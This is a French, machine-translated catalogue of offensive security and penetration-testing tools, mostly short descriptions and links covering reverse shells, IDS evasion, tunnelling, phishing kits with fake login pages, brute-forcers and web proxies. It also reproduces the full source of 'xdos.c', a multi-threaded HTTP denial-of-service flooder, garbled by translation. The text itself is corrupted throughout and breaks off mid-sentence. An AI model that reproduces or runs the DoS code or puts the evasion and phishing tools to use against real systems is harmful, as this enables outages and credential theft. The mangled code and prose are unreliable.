http://bernardodamele.blogspot.com/2011/04/reverse-connection-icmp-shell ... Un Shell ICMP Simple inverse! Le principal avantage sur les autres outils open source, c'est qu'il ne ncessite pas de privilges d'administrateur pour excuter sur la machine cible. Caractristiques * Les logiciels libres - principalement codes par Nico, fourchue par moi. * Architecture client / serveur. * Le capitaine est portable sur toute plate-forme qui peut fonctionner soit C, P erl ou Python code. * Le systme cible doit tre Windows parce que l'esclave fonctionne sur cette plateforme uniquement pour l'instant. * L'utilisateur excutant l'esclave sur le systme cible ne ncessite pas de privilges d'administration. inundator

http://sourceforge.net/projects/inundator/ IDS / IPS WAF Evasion / & Tool inondations Qu'est-ce que inundator? inundator est un multi-thread, la file d'attente moteur, outil de l'vasion IDS. S on but est de faon anonyme inondations systmes de dtection d'intrusion (Snort prcisme nt) avec un trafic destin dclencher de faux positifs par le biais d'un proxy SOCKS afin de masquer une attaque relle. Quand utiliser inundator?

inundator sera utilis mme si vous pensez qu'il ya une chance importante de l'attaq ue que vous vous apprtez effectuer peuvent tre dtects par le systme de la cible de dt ction d'intrusion.Vous lancement inundator avant de commencer l'attaque, et cont inuer bien fonctionner aprs avoir fini de l'attaque. L'espoir est que si votre at taque est dtecte par l'IDS, l'alerte sera enterr parmi plusieurs milliers de faux p ositifs, ce qui rduit la possibilit d'un analyste IDS dtecter l'attaque relle. natprobe http://code.google.com/p/natprobe/ Ce petit programme, mais trs utile, essayez d'envoyer des paquets ICMP sur le rsea u local, et de dtecter tous les htes qui le permettent. Pentecte cela, vous pouvez trouver des bugs dans votre (entreprise?) Rseau (ou autres), par exemple pour les htes qui permettent des connexions P2P. Explication Lorsque nous utilisons une passerelle, nous envoyons les paquets avec dest IP de la cible, mais le dest mac sur le rseau Ethernet est le mac la porte d'entre. Si nous envoyons un paquet l'macs diferents dans la langue, nous pouvons savoir qui est la passerelle lorsque nous recive une rponse de ce mac. Parfois, on peut dcouvrir plus d'une case configur pour tre une passerelle, en gnral, il s'agit d'une mauvaise configuration, et la bote de rponse avec un ICMP-Redirec t. C'est la mme chose, parce que le script seulement vrifier si la rponse mac. nbtool http://www.skullsecurity.org/wiki/index.php/Nbtool Quelques outils pour NetBIOS et DNS enqute, les attaques, et de la communication. Caractristiques * DNS backdoor (dnscat) o v0.04 NetBIOS * requtes, les enregistrements, et les rejets (nbquery) NetBIOS * sniff et l'empoisonnement (nbsniff) * Cross-site scripting sur DNS (dnsxss) * DNS sniffer (dnslogger) * Testeur de DNS (dnstest) NCAT http://nmap.org/ncat/ NCAT est un utilitaire rseau dot de nombreuses fonctions qui lit et crit les donnes travers les rseaux de la ligne de commande.NCAT a t crit pour le projet Nmap comme u ne r-implmentation nettement amliore de la vnrable Netcat. Il utilise la fois TCP et DP pour la communication et est conu pour tre un outil fiable back-end pour fourni

r instantanment une connectivit rseau vers d'autres applications et utilisateurs. N CAT permettra non seulement de travailler avec IPv4 et IPv6, mais fournit l'util isateur un nombre pratiquement illimit d'utilisations potentielles. nwmap http://sourceforge.net/projects/nwmap/ Il s'agit d'un script Perl qui prend un fichier PPCE en entre et identifie les so us-rseaux valides dans le mme. Il prend alors le masque de / 24 et recherche dans tous ces sous-rseaux pour vivre IP. Il a ensuite tous les groupes d'adresses IP b ases sur le nombre de sauts. ostinato http://code.google.com/p/ostinato/ Ostinato est un open-source, multi-plateforme artisan paquet rseau gnrateur de traf ic et / analyseur avec un GUI facile utiliser.Artisanat et envoyer des paquets d e plusieurs flux avec des protocoles diffrents des vitesses diffrentes. Pour la li ste complte des fonctionnalits voir ci-dessous. Ostinato vise tre Wireshark in Reverse" et devenir complmentaire de Wireshark. Caractristiques * Fonctionne sur Windows, Linux, BSD et Mac OS X (fonctionnera probablement sur d'autres plateformes galement avec peu ou aucune modification, mais cela n'a pas t test) * Support des protocoles les plus courants standard o SNAP Ethernet/802.3/LLC VLAN o (avec QinQ) ARP o, IPv4, IPv6, IP-in-Tunnels IP IP alias (6over4, 4over6, 4over4, 6over6) O TCP, UDP, ICMPv4, ICMPv6, IGMP, MLD o Un protocole bas sur du texte (HTTP, SIP, RTSP, NNTP, etc) o Plus de protocoles dans les uvres ... * Modifier tous les champs de n'importe quel protocole (certains protocoles perm ettent de changer les champs des paquets avec tous les paquets au moment de l'exc ution, par exemple changer adresses IP / MAC) * Utilisateur fourni Hex Dump - prciser certains ou tous les octets dans un paque t * L'utilisateur script dfini pour remplacer un protocole non implmente (EXPERIMENTA L) * Protocoles de la pile dans n'importe quel ordre arbitraire * Crer et configurer plusieurs flux * Les taux de flux Configurer, clate, no. de paquets * Seul client peut contrler et de configurer plusieurs ports sur plusieurs ordina teurs gnrer du trafic * Le contrle exclusif d'un port pour empcher le systme d'exploitation d'envoyer des paquets errants fournit un environnement de test contrl * Statistiques fentre montre en temps rel du port de rception / transmission des st atistiques et des taux * Capture de paquets et de les visualiser (besoins Wireshark pour afficher les p aquets capturs) * Cadre d'ajouter facilement de nouveaux constructeurs protocole pcapdiff http://www.eff.org/testyourisp/pcapdiff Pcapdiff est un outil dvelopp par le FEP pour comparer deux captures de paquets et de dterminer quels pourraient tre contrefaits, tomb ou paquets mutil. Deux amis tec hniquement inclin peut mettre en place des captures de paquets (tcpdump par exemp

le ou Wireshark) sur leurs propres ordinateurs et de produire le trafic rseau ent re les deux ordinateurs sur Internet. Plus tard, ils peuvent courir pcapdiff sur les deux fichiers de capture de paquets pour identifier les paquets suspects po ur complment d'enqute. proxocket proxocket http://aluigi.altervista.org/mytoolz.htm # Luigi Auriemma a construit un outil formidable qui s'appelle Proxocket, qui peut tre utilis pour capturer les appels entre une application et les fonctions Winsoc k dans Windows. Proxocket est tout simplement deux fichiers DLL (ws2_32.dll et w sock32.dll) qui doivent tre placs dans le mme rpertoire que l'exe. De l'application pour laquelle vous voulez surveiller le trafic rseau.Ceux-ci agissent en tant que fichiers DLL procurations vers les fichiers rels Winsock DLL (avec les mmes noms) , qui rsident dans "C: \ Windows \ System32 \". DLL proxy Mise Luigi dans le mme d ossier que le fichier exe. Causes de l'application de charger les DLL proxy plutt que les DLL Winsock rel. Proxocket relais tous les paquets entre l'application e t le rel Winsock DLL, mais tous les paquets transmis est aussi crit dans un fichie r PAC. Proxocket par. Proxocket injecte entre l'application et Winsock Non seulement Proxocket vous permettent de sniffer le trafic vers et partir d'un e application sans avoir charger un pilote de rseau ou une application raw socket renifler, il permet aussi de scruter le trafic va localhost. Mais pourquoi quel qu'un voudrait-il tablir une connexion rseau localhost, vous pourriez demander. J' ai personnellement utilis prises localhost dans mes applications quand je code en cours d'excution dans diffrents processus ou threads et ont besoin d'un moyen eff icace pour eux d'changer des donnes de manire asynchrone (NetworkMiner ne pas en ut iliser localhost pour la communication inter-processus, cependant). Je suis en f ait assez sr de nombreux dveloppeurs de logiciels utilisent des sockets localhost quand ils ont besoin pour assurer l'change de donnes entre les diffrents processus. Localhost connexions sont galement utiliss lorsque Stunnel en cours d'excution ou d e procurations TOR sur votre machine locale, qui crypter tout le trafic sortant. Vous pouvez ainsi utiliser Proxocket afin de capturer le trafic rseau AVANT il e st chiffr par Stunnel ou TOR. pwnat http://samy.pl/pwnat/ pwnat, prononc "poe-nat", est un outil qui permet tout nombre de clients derrire des NAT de communiquer avec un serveur derrire un NAT spare avec * pas de redirection de port * * et aucune configuration DMZ * sur tous les routeurs pour faire directement communiquer les uns avec les autres. Le serveur n'a pas besoin de savoir quoi que ce soit sur les clients essayant de se connecter. Autrement dit, il s'agit d'un serveur proxy qui fonctionne derrire un NAT, mme lorsque le client est derrire un NAT, sans troisime partie. Il n'y a pas d'intermdiaire, pas de proxy, pas de troisime partie, pas de UPnP / STUN / ICE requis, aucune usurpation, et pas de trucs DNS. Plus important encore, le client peut alors se connecter tout d'accueil ou d'un port sur un hte distant ou un hte fixe et port a dcid par le serveur. rdp2tcp http://rdp2tcp.sourceforge.net/ http://www.ossir.org/paris/supports/2010/2010-12-14/rdp2tcp.pdf

rdp2tcp est un outil de tunneling sur le dessus de Remote Desktop Protocol (RDP) . Il utilise les capacits de RDP canal virtuel pour multiplexer plusieurs ports d 'expdition sur une session rdesktop dj tabli. Fonctions disponibles: * Transfert de port TCP * Transfert inverse de port TCP stdin processus de transfert * / out * SOCKS5 soutien minimal Le code est dcoup en 2 parties: * Le client en cours d'excution sur le ct client rdesktop * Le serveur qui tourne sur le ct serveur Terminal Server

Une fois que les clients rdp2tcp et le serveur sont excuts, la gestion des tunnels est effectue par le contrleur (sur le ct client).Le contrleur gnral couter sur local t (port 8477) d'attente pour les inscriptions nouveau tunnel. tcpjunk http://code.google.com/p/tcpjunk/ Tcpjunk est un des protocoles TCP gnrales d'essai et le piratage des services publ ics. Caractristiques principales: * Prise en charge IPv4/IPv6 * Automatiquement envoyer / recevoir des donnes en fonction de configuration de s ession prdfinie * Le mode Client / Serveur * Prise en charge SSL * Donnes dynamiques d'insertion et de manipulation en utilisant les balises Gnration de trafic * * En mode graphique udptunnel http://code.google.com/p/udptunnel/ Tunnels TCP sur les paquets UDP. Fonctionne dans l'espace utilisateur sur Linux, Solaris, Cygwin (avec extension IPv6), et natif Win32. Actuellement il n'y a pa s d'authentification ou de chiffrement xdos.c nant Un outil simple HTTP DoS! xdos.c $ $ $ $ # # # # Define WIN32_LEAN_AND_MEAN Include Include Include

$ Unsigned long fil = 0; connect_tv int $ statique (struct sockaddr_in * addr, int timeout); $ Statique DWORD WINAPI dosmain (p LPVOID); const $ int main (int argc, char * argv [])

$ { $ If (argc! = 4) { $ Puts ("\ t \ t \ t \ tXDOS - par Bull Moose \ n"); $ Printf (: argv "Usage% s [IP] [Port] [Sujets] \ n", [0]); $ 1 de retour; $} $ Puts ("OPE Initier ... \ n"); $ Struct sockaddr_in saddr; $ Unsigned long tid; $ Int i; $ $ Memset (& saddr, '\ 0', sizeof (saddr)); $ Saddr.sin_family = AF_INET; $ Saddr.sin_addr.s_addr = inet_addr (argv [1]); $ Saddr.sin_port = (short) htons (atoi (argv [2])); $ $ Pour (i = 1; i <= atoi (argv [3]); i + +) CreateThread (0,0, dosmain, (LPVOID) & saddr, 0, & tid); $ Puts ("droulement de l'attaque engage \ n"); $ Dosmain (& saddr); $ Return 0; $} connect_tv int $ statique (struct sockaddr_in * addr, int timeout) $ { $ S int; $ I unsigned long; wr_fds fd_set $, err_fds; $ Struct timeval tv; $ $ S = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP); $ If (s == 0 | | s == INVALID_SOCKET) return 0; $ timeout = tv.tv_sec $ / 1000; $ Tv.tv_usec = 0; $ $ I = 1; $ Ioctlsocket (s, FIONBIO, & i); $ $ Pour (;;) { $ I = communiquer (s, (struct sockaddr *) addr, sizeof (struct sockaddr_in)); $ If (i! = SOCKET_ERROR) $ Goto exit_connected; $ I = WSAGetLastError (); $ If (i == WSAENOBUFS) { $ Sleep (50); $ Continuer; $} $ If (i == WSAEWOULDBLOCK) $ Break; $ Goto exit_err; $} $ $ FD_ZERO (& wr_fds); $ FD_SET (s, & wr_fds); $ FD_ZERO (& err_fds); $ FD_SET (s, & err_fds); $ I = select (s +1, NULL, & wr_fds, & err_fds, et tv); $ $ If (i == 0 | | i == -1) $ Goto exit_err;

$ If (FD_ISSET (s, & err_fds) | |! FD_ISSET (s, & wr_fds)) $ Goto exit_err; $ $ Exit_connected: $ I = 0; $ Ioctlsocket (s, FIONBIO, & i); $ S le retour; $ $ Exit_err: closesocket $ (s); $ Return 0; $} $ Statique DWORD WINAPI dosmain (p LPVOID) $ { Extern unsigned $ long fil; thread $ + +; $ $ Printf ("% u nombre Thread lanc \ n!", Fils); $ Struct sockaddr_in addr; $ Char Buffer [] = \ $ "GET / HTTP/1.1 \ r \ n" $ "Host: 127.0.0.1 \ r \ n \ r \ n"; $ SetThreadPriority (GetCurrentThread (), THREAD_PRIORITY_BELOW_NORMAL); $ Sock int; $ If (p == NULL) Dbut ex; $ Addr = * (struct sockaddr_in *) p; $ Pour (;;) { $ Sock = connect_tv (& addr, 8); $ If (chaussette! = 0) { $ Send (sock, Buffer, strlen (Buffer), 0); $ Sleep (300); closesocket $ (sock); $} Else if (sock == SOCKET_ERROR) { $ Puts ("Erreur:. Erreur de socket \ n"); ExitProcess $ (1); $} $} $ Ex: ExitThread (0); $ Return 0; $} $ $ Befire supprimer tous les compiler make.bat @ Xdos.exe gcc-S-O-o-xdos.c lws2_32 RPSS http://celnet.co.in/tools/Index.php RPSS (Remote Shell SCURIT Penetration Testing) est l'outil EXTENSION DE VOTRE SHEL L ou bash. Il va ajouter QUELQUES FONCTIONNALITE SUPPLMENTAIRES SUR LA BASE DE SCU RIT ET DE PENETRATION votre shell. Cet outil va accder Internet depuis invite de c ommande. En gros, cela Worke outil comme un BROUSER DE shell de commande. IL fat ch VULNARABLITY lis la scurit et il affichera ET CONSERVER sa sortie dans les fichi ers spcifiques. C'EST SHELL DE SCURIT puissante qui peut tre pntrer dans tout type DE LA DEMANDE WEB. Si vous tes expriment TESTEUR HACKERSAFE ou la pntration, puis en uti lisant cet outil vous pouvez rendre votre processus de pntration plus rapide et fa cile. CET OUTIL EST couvrant presque tous les techniques de piratage et de pntrati on.En gros, si vous tes nouveau dans MONDE ET SECURITRY vous avez des devoirs dif ficiles pntrer APPLICATION WEB DE NOMBREUX QUE VOUS POUVEZ ALORS accomplir votre tc

he en quelques heures UTILISANT RPSS. Pourquoi RPSS? Si nous parlons Techniquement ENTIER PROGRAMMATION RPSS a t faite selon Thread Thr ead grand nombre se fait CREAT POUR REMPLIR UN PROCESSUS. SO le temps d'excution ET PROCESSUS DE RPSS est trs rapide, puis Outils AUTRES. La logique de chaque tche est trs unique, il ira l'encontre TOUT DE LA CIBLE. Ce n'est pas chose cet objec tif n'a STRONG du firewall, systme de dtection d'intrusion ou ET FILTARATION IP es t install.RPSS SERA PAR passer tous les couches de scurit et il vous fournira des R ISULT PRCISE. VOUS pouvez utiliser cet outil dans un but diffrent, comme les tests PENETRATION JURIDIQUE, TESTER VOTRE PROPRE WebApplication VULNARABLITIES, BUT e nqute mdico-lgale, tester les composants SEUCRITY ETC ... FONCTION PROXY 1> getProxy 2 Testproxylist> 3> Testproxy 4 autoproxy> 5> Jumping 6> Loadproxy 7> supprimer 8> Modification PIED D'IMPRESSION 9 ip> se 10 adresses smtp> accaparement 11> traage bruts 12> identifier la technologie de serveur (en-tte) 13> collecte plein d'infos serveur tte 14> ramper e-mails provenant des moteurs de recherche (capacit de suivre des emai ls trop compliqu) 15 site> rampants (liens s'agiter de mme rpertoire) 16 Finder> page de connexion (soutien des ASP, ASPX, PHP, CFM, JSP, HTML, HTM, s ans des charges utiles) 17 sous> recensement de domaine 18 titres> nom d'hte de la gamme IP Analyse 19> service de serveurs Web 20 structure du site> empreintes digitales 21> qui est rechercher 22> inverser 23> numre les utilisateurs du serveur D'impression 24> pied dmon 25 systme d'exploitation> impression pied 26> SSLcheck (par cette tche, vous pouvez tester chiffrement SSL) 27> DBcheck (par cette tche, vous pouvez tester la base de donnes) 28> La surveillance de serveur web ANALYSE 29> obtenir des informations de port + d'infos service (avec du fil de manire trs rapide) D'injection 30> SQL Scan automobile de 30,1> numrisation url auto-30.2> la cration d'url exploitable auto-30.3> cheacking version auto-30.4> fuse table D'injection 31> balayage alatoire 32 LFI> scan 33 rfi> scan 34 rce> scan 35 xss> scan (HTTPS soutien aussi)

36 cgi> scan (chemins vuln plus) 37 cm> scan (joomla soutien, etc ... REMOB) 38> analyse personnalise 39> analyse complte Testant 40> ftp bruiting (premier chque de connexion anonyme) 41> bruiting smtp 42> bruiting imap 43> bruiting nntp 44> bruiting pop3 45> dbrutage RDP 46 rdp> dbrutage de plage d'adresses IP CRYPTAGE 47> Hashid 48 Onlinehash> 49 Autohash> 50> Md5 51> Sha1 52> SHA256 53> SHA384 54> SHA512 55> Base64enc 56> Base64dec SOUTIEN 57 constructeurs liste de mots> utilisant une combinaison personnalise 58> extraire des adresses IP partir de fichiers 59> extraire des courriels partir de fichiers 60> ramper mots de l'un des web qui vous est donne par 61 utilitaire wget> Task Server 62> obtenir des informations de port + d'infos service (avec du fil de manire trs rapide) 63 d'injection SQL> scan auto-63.1> numrisation url auto-63.2> la cration d'url exploitable auto-63.3> cheacking version auto-63.4> fuse table D'injection 64> balayage alatoire 65 LFI> scan 66 rfi> scan 67 rce> scan 68 xss> scan (HTTPS soutien aussi) 69 cgi> scan (chemins vuln plus) 70 cms> scan (joomla soutien, etc ... REMOB) 71> analyse personnalise 72> analyse complte VERBOUS TASK 73> obtenir des informations de port + d'infos service (avec du fil de manire trs rapide) 74 d'injection SQL> scan auto-74.1> numrisation url auto-74.2> la cration d'url exploitable auto-74.3> cheacking version auto-74.4> fuse table 75 d'injection> balayage alatoire 76 LFI> scan 77 rfi> scan 78 rce> scan 79 xss> scan (HTTPS soutien aussi) 80 cgi> scan (chemins vuln plus)

81 cm> scan (joomla soutien, etc ... REMOB) 82> analyse personnalise 83> analyse complte FORENSIC 84 analyse maleware> 85 analyse de Troie> (tche trs stupide) Exe 86> lot 87 Fileanalysis> 88 iptrace> Pentest (DE TRAVAIL SUR LA TCHE FEW) 89> Penmysql 90> Penpostgray 91> Penmssql 92 Penoracle> 93 Penaccess> EXPLOIT (pas test tous) 94 Expsearch> 95> Milexpgrab 96> Pacexpgrab 97> Mad 98 Boa> 99 Buletftp> 100 CesarFTP> 101 Efs> GOOGLE DORK (TCHE annes a PROBLME DE TRAVAIL SUR IT) 102 Dorkscan> 103 sous-balayage> 104 Gvscan> 105 Shellscan> 106 Ranker> 107 Usergrab> 108 Dorkcreator> 109 Cmsscan> RACINE (en dveloppement) 110> Bandtest 111> Les inondations 112 Honeypot> 113> Chat 114> Jeux 115 Ids> 116 automachine> Ingnierie sociale Imposteur http://www.andlabs.org/tools.html Imposteur est un cadre flexible pour effectuer navigateur attaques de phishing. Une fois le systme en cours d'excution Imposter est configur comme serveur DNS pour les victimes, le serveur DNS interne de Imposter rsout toutes les requtes DNS lui -mme. Lorsque la victime essaie d'accder tout site Web du domaine dcide de le systme qui excute le serveur Imposter et Imposter Web interne sert du contenu de la victime. Selon la configuration des charges utiles sont envoys la victime. Les donnes voles la victime est renvoye imposteur et il est stock dans une base de donnes SQLite da ns un dossier cr avec son nom bas sur la date et l'heure de l'attaque. Les listes des attaques effectues sont:

* * * * * * * *

Cookies Steal Placer des cookies Steal Local Shared Objects Mots de passe stocks Steal de FireFox Les fichiers mis en cache Steal Cache du navigateur Poison Les fichiers Steal du systme de la victime fichier local via Internet Explorer Excuter des requtes SQL sur Google de la victime base de donnes Gears et transfrer les rsultats * Crer un ResourceStore et grs ResourceStore sur LocalServer de la victime Google G ears Exigences gnrales: * Des droits d'administration: Raisons: o Imposter coute sur les ports et 53/UDP 80/TCP o Le module 'Stealer File' excute un dtecteur interne * Systme excutant Imposter doit avoir l'adresse IP 192.168.1.3 Raisons: o interne du serveur DNS rsout tous les domaines 192.168.1.3 * WinPcap doit tre install sur le systme S-E Ninja http://www.security-database.com/toolswatch/Social-Engineering-Ninja-v0-1-Beta.h tml SE Ninja est un outil d'ingnierie sociale, avec des pages 20-25 sites populaires faux et mailer anonyme via fonction mail () en PHP. Sites disponibles: * * * * * * * * * * * * * * Amazon.com Digg.com Ebuddy.com Facebook.com Gmail.com Hotmail.com Msn.com (hotmail) Myspace.com Onecard.com (AR, FR Langs) Paypal.com Travian.com (AR, FR Langs) Twitter.com Yahoo.com Youtube.com

Caractristiques: * Fakepages. * IP, page malveillante vous donne l'adresse ip de la victime. * Mailer. Vous pouvez envoyer un message anonyme utilisant PHP mail () Fonction / [SENINJA

] / admin / mail et vous pouvez obtenir votre ip victime le mettre dans la base de donnes "/ [SENINJA] / ip /" Tlcharger partir de http://brokenpixel.com/images/seninja.zip Bote outils d'ingnierie sociale http://www.social-engineer.org/resources/set.html "La bote outils d'ingnierie sociale (SET) est une rsonnaliss qui se concentre uniquement sur l'attaque pntration. Son but principal est d'accrotre et de sociale et permettre l'appareil d'essai pour tester attaque cible peut russir. " VOIP UCSniff http://ucsniff.sourceforge.net/ UCSniff est un VoIP et IP Video Security outil d'valuation qui intgre les logiciel s open source existants dans plusieurs fonctions utiles, permettant la VoIP et I P propritaires vido et professionnels de la scurit de tester rapidement la menace de non autorises et contre les coutes VoIP vido. Ecrit en C / C + +, et disponible su r Linux et Windows, le logiciel est gratuit et disponible pour quiconque veut le s tlcharger, sous la licence GPLv3. Certaines fonctionnalits utiles de UCSniff qui ont t combins en un seul paquet: Videojak http://videojak.sourceforge.net/ VideoJak est un outil de vido sur IP valuation de la scurit qui peut simuler une pre uve de concept ou d'interception vido test rejouer contre une cible, la session v ido slectionne par l'utilisateur. VideoJak est le premier de son genre outil de scur it qui analyse vido codec normes telles que H.264. VideoJak consiste tout d'abord capturer le port RTP utiliss dans une conversation vido ou d'un ruisseau. Ensuite, VideoJak analyse les paquets RTP, la collecte des numros de squence RTP et les va leurs timestamp utilis entre les terminaux vido. Puis VideoJak cre une charge utile de vido personnalis en changeant les numros de squence et les valeurs timestamp uti lis dans les paquets RTP d'origine entre les deux terminaux vido. Aprs que l'utilis ateur slectionne un dispositif vido et conues pour l'attaque lors d'une sance vido en cours, VideoJak fournit la charge utile sur le port appris RTP contre la cible. Il en rsulte attaque dans un des plusieurs nouvelles fonctionnalits: Web Andiparos suite python-conduit d'outils pe de l'lment humain des tests de simuler des attaques d'ingnierie efficacement la faon dont une

http://code.google.com/p/andiparos/ Andiparos est un fork du clbre Proxy Paros. Il s'agit d'une web application open s ource outil d'valuation de la scurit que donne la capacit testeurs de pntration l'ara gne sites Web, d'analyser le contenu, d'intercepter et modifier les demandes, etc L'avantage de Andiparos est principalement le soutien des certificats clients su r cartes puce. En outre, il dispose de plusieurs amliorations de l'interface peti tes, ce qui rend la vie plus facile pour les testeurs de pntration ... Arachni http://github.com/Zapotek/arachni {} Arachni est un cadre complet de fonctionnalits et modulaire qui permet Ruby te

steurs de pntration et aux administrateurs d'valuer la scurit des applications web. {} Arachni est intelligent, il se forme chaque rponse HTTP qu'il reoit au cours du processus d'audit. Contrairement d'autres scanners, Arachni prend en compte la nature dynamique des applications web et peut dtecter les changements causs lors d'un voyage travers chaque chemin de la complexit cyclomatique d'une application Web. Cette faon vecteurs d'attaque d'entre / qui seraient autrement indtectables par les non-humains sont parfaitement gres par Arachni. Caractristiques de Arachni: * Fournir un cadre stable et efficace * Soyez simple * Le soutien Cookie-jar * Le support de SSL. * User Agent spoofing. * Support de proxy SOCKS et HTTP pour les (S). * SOCKS support est fourni gracieusement par socksify. * L'authentification du proxy. * L'authentification du site. * Local DNS limites cache des requtes de rsolution de nom. * Lib de sortie personnaliss. * Le systme utilise ses propres enveloppes d'impression pour afficher des message s. * Sortie en surbrillance la ligne de commande, le style Metasploit. * Excuter mods dernire option. * Permet d'excuter les modules aprs analyse du site est termine. * Abstraction d'assurance-chmage. * Seuls {Arachni:: UI:: CLI} pour le moment, mais WebUI & GUI sont relativement faciles mettre en uvre ds maintenant. * Les Piges Ctrl-C interrompre. Interruptions * suspendre le systme, l'utilisateur a alors la possibilit soit de r eprendre ou de sortie. Le Site Crawler inclus avec Arachni a les caractristiques suivantes: Le robot est fournie par Anemone avec quelques lgres modifications pour tenir comp te des fonctionnalits supplmentaires. * Filtres pour les pages redondantes, comme les galeries, catalogues, etc bass su r des expressions rgulires et des compteurs. exclusion URL * filtre bas sur les expressions rgulires. inclusion URL * filtre bas sur les expressions rgulires. * Les sjours dans le domaine par dfaut et il va probablement le rester. * Peut ventuellement suivre les sous-domaines. * Multi-thread avec un nombre de thread rglable. * La limite de profondeur rglable. * Rglable limite nombre de liens. * Rglable rediriger limite. L'analyseur de code HTML fourni par Arachni offre les fonctions suivantes: Peut extraire et d'analyser: * Formulaires * Liens * Cookies BlindElephant

http://blindelephant.sourceforge.net/ Le BlindElephant Web Application Fingerprinter tente de dcouvrir la version d'une application web (connu) en comparant les fichiers statiques des endroits connus contre les hachages prcalcules pour les versions de ces fichiers dans tous les to us les communiqus disponibles. La technique est rapide, faible bande passante, no n-invasive, gnrique et fortement automatis. BodgeIt Store https: / / code.google.com / p / bodgeit / La Boutique BodgeIt est une application web vulnrable qui est actuellement destin aux personnes qui sont nouveaux l'essai stylo. Certaines de ses fonctionnalits et caractristiques: * Facile installer - il suffit ncessite java et un moteur de Tomcat * Autonomes (pas de dpendances supplmentaires autres que de 2 sus) * Facile de changer la vole - toutes les fonctionnalits est P, donc pas ncessaire IDE * Plate-forme de croix * Open source * Pas de db spare installer et configurer - il utilise un tomatiquement (re) initialis au dmarrage servlet, par exemple dans la ligne ci-des mis en uvre dans les JS

"en mmoire" db qui est au

Tout ce que vous devez faire est de tlcharger et d'ouvrir le fichier zip, puis ext rayez le fichier war dans le rpertoire des webapps votre moteur de servlets favor i. Ensuite, pointez votre navigateur sur (par exemple) http://localhost:8080/bodgei t Vous pouvez trouver plus facile de trouver des vulnrabilits en utilisant un outil de test stylo. Si vous n'avez pas un favori, je vous le recommande le Zed Attack Proxy (pour le quel je suis le chef de projet). Le Bodge Il Store incluent les vulnrabilits majeures suivantes: * Cross Site Scripting * Injection SQL * Cache (mais non protgs) contenu * Faux Croix-Site Request dboguer le code * Rfrences * Objet inscurit vulnrabilits * logique de demande Navigateur Fuzzer http://www.krakowlabs.com/dev.html Navigateur Fuzzer 3 est conu comme un cadre hybride / fuzzer autonome; les module s qu'il utilise sont extensibles, mais aussi fortement intgr dans le noyau. BF3 pe ut tre utilis via la ligne de commande pour rgler tous les drapeaux ncessaires pour chaque opration de fuzzing. Aprs l'initialisation, BF3 cre des cas de test dans un systme numrotes. Le fuzzing est automatise par le biais du navigateur en utilisant l a mthode d'actualisation. Si l'erreur est dtecte, les journaux du serveur peuvent d onner une ide du scnario de test dlinquance.

Caractristiques CSS Fuzz, DOM, HTML, JavaScript et XML Avec et sans assistance Modes Fuzzing Gnration 7 Fuzzing Oracle Gnrateur alatoire de donnes Mutation Fuzzing moteur

Browser Rider http://www.engineeringforfun.com/ BrowserRider est un cadre intgr pour exploiter les vulnrabilits par cross site scrip ting. Son but est de prouver l'impact de cette vulnrabilit lors d'une valuation de la vulnrabilit. Burp Suite http://portswigger.net/suite/ Burp Suite est une plate-forme intgre pour attaquer les applications web. Il conti ent tous les outils Burp avec de nombreuses interfaces entre eux visant facilite r et acclrer le processus d'attaquer une application. Tous les outils partagent le mme cadre robuste pour la gestion des requtes HTTP, la persistance, l'authentific ation, les proxies amont, l'exploitation forestire, d'alerte et d'extensibilit. Burp Suite vous permet de combiner des techniques manuelles et automatiques d'numr er, d'analyser, de numrisation, d'attaque et exploiter des applications web. Les diffrents outils Burp collaborer efficacement pour partager des informations et p ermettre les rsultats identifis dans un seul outil pour former la base d'une attaq ue l'aide d'un autre. Principales caractristiques propres l'Burp Suite comprennent: * L'analyse dtaille et le rendu des demandes et rponses. * One-click transfert des demandes intressante entre les outils. * L'information Plan du site montrant accumuls sur les applications cibles dans l 'arbre et sous forme de tableau. * Possibilit de passivement une demande d'araigne d'une manire non-intrusive, toutes les demandes provenant de navigateur de l'utilisateur. * Suite au niveau configuration champ cible, de conduite de nombreuses actions o util individuel. * Entirement vritable scanner de vulnrabilits web. [Version Pro uniquement] * Possibilit de sauvegarder et de restaurer l'tat. [Version Pro uniquement] * Analyse compatible FIPS statistiques de hasard jeton de session. * Utilitaires pour le dcodage et la comparaison des donnes d'application. * Une gamme d'outils de l'engagement, pour rendre votre travail plus rapide et p lus efficace. [Version Pro uniquement] * Fonction de recherche Suite l'chelle. [Version Pro uniquement] * Support des clients personnaliss et des certificats SSL serveur. * Extensibilit via l'interface IBurpExtender. * Configurs de manire centralise les paramtres de proxy en amont, le web et l'authen tification de proxy, et l'exploitation forestire. * Outils peut fonctionner dans une seule fentre onglets, ou tre dtachs dans des fentr es individuelles. * Fonctionne dans les deux sous Linux et Windows. CAT http://www.contextis.co.uk/resources/tools/cat/ CAT est conu pour faciliter la pntration de l'application web manuel d'essai pour p lus complexes, exigeant des tches de test d'applications. Il limine certains des lme

nts les plus rptitives du processus de test, le testeur permettant de se concentre r sur les demandes individuelles, leur permettant ainsi d'effectuer un test beau coup plus approfondie. Conceptuellement, elle est semblable d'autres proxies dis ponibles commercialement et open source, mais CAT fournit un ensemble riche fonc tionnalit et une plus grande performance, combine une interface utilisateur plus i ntuitive. Il ya un certain nombre de diffrences entre les CAT et les procurations Web actue llement disponibles. Ils comprennent: CAT utilise le moteur de rendu d'Internet Explorer pour HTML reprsentation exacte Il supporte de nombreux types de conversions de texte, notamment: URL, Base64, H ex, Unicode, HTML / XML, SQL et JavaScript sans les guillemets Il propose une offre intgre d'Injection SQL et XSS dtection Les procurations synchronise pour l'authentification et la vrification d'autorisat ion Meilleure performance en raison de la mise en cache de connexion HTTP Version SSL et de dames Cipher utilisant OpenSSL Plus de flexibilit pour l'importation de projets / exportation des grumes et des c onomies Interface onglets permet d'utiliser plusieurs outils la fois par exemple rpteurs m ultiples et diffrents journaux La possibilit de rpter et de modifier une squence de requtes (particulirement utile da ns les essais SSO) C'est gratuit! CEWL http://www.digininja.org/projects/cewl.php CEWL (gnrateur de liste de mots) est une application ruby que les araignes une URL do nne une profondeur dtermine, ventuellement aprs les liens externes, et retourne une l iste de mots qui peuvent ensuite tre utiliss pour cracker comme John the Ripper. C EWL se prononce "cool". ClickjackingTool http://www.contextis.co.uk/resources/tools/clickjacking-tool/ Clickjacking outil Clickjacking est un premier terme introduit par Jeremiah Grossman et Robert Hans en en 2008 pour dcrire une technique par laquelle un attaquant trucs un utilisate ur effectuer certaines actions sur un site Internet en masquant les lments cliquab les dans une iframe invisible. Bien qu'il ait fait deux ans que le concept a t introduit, la plupart des sites n' ont toujours pas mis en uvre une protection efficace contre 